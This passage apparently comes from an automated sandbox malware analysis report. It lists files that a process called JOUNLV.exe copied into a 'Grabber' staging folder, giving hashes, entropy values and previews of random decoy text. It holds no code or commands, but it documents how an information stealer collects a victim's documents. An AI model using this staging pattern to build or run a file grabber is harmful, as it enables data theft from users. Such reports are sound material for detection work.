                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX\JSDNGYCOWY.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX\WUTJSCBCFX.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX\YPSIACHYXW.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX\ZBEDCJPBEY.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW\CURQNKVOIX.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688505748329201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                                                                                                                                                                          MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                                                                                                                                                                          SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                                                                                                                                                                          SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                                                                                                                                                                          SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:CURQNKVOIXHCBQTSXQTLVFUQNXQHHCWYVOGQUFVROSMMUONAUKUVELZWAMQGAGYEFMWBMUVKBAZCJASDGVTNFSHXHAPKEOWREALSYDMQPTJCKDQQZDNAPQIKAIKYDUXQDSIUJTIPCNAAPMQGBGORBBNYWTYRCODCKULTLKEDUVEVKYPTDPYWDHCCBFECLXTAHWTXYPAZBSUTWHNQPXUDZWAFEXNNPHGXWELAOZZREMNKMEKGTYGDHHUPJBMUOYYXAJRRWPIQWIEPWHTLVXJLPGWKHKFXPDTYKJNXBLYYCPPFYQHGBFNFBWUMKZVGJIAVXIXSEBJLYUYIFUDPWOVTOOTBWQNFVWLEYTFZYMTVZTCXTNNOBULSEYPLNAUCUUXLNZYIOCYYDRCXSVNBKUELOGHSLSPEKWUKINGRPMAGAJOPDOAGHPUAWUEWUGLAMOKASQCGYIJJNOEPUMCDLGYXGDJZABOLHJPLTUZIRBYLLYXROOEMOQWYXXOAXTWHXGMBRZIHEQPGICIJAOUSIKAJLZMEYDYWOFIVZEOLJQJXJLMMENDALUSENORVPGKLPBGAOQTNXCQSBECDXXCUNXHQLIPKOPVIETEIHHAZEFGOVYXJDBAQKQLDPIRHULNGBRDMBBZUKYVYIMBYVBNOIAKOFSHELZEVHLIYEWGVJXILTMZMBNWYJQUHFWZYDKPGFHJSRFOPTSUPYFZPRAIHCOAERERYGBLWLZZXLVAABEELDQELBYYROYSDLAWBIXRDKWLSLZQHNQYXERTVTNXGSHYGJOFVZISVKALMEBXVVOOXWYXSEINIZOTUVHTHDUHOJYJHLRGMSQXTWPSJZLTSSIKIIZPANAJSXTZAQBOKZRWBIRVFAHJIOEWMRKYMRVDYTGEWXHCWSRYRIGQHBYXEUXHZUSULJVNSYTNQRKAFOOQPRHBAAWVXLENJLGFYHTWUFVYSQDBXKEFYRPMBGBHQLJSVGLYIZQREICHIHYUTGCEP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW\JSDNGYCOWY.xlsx

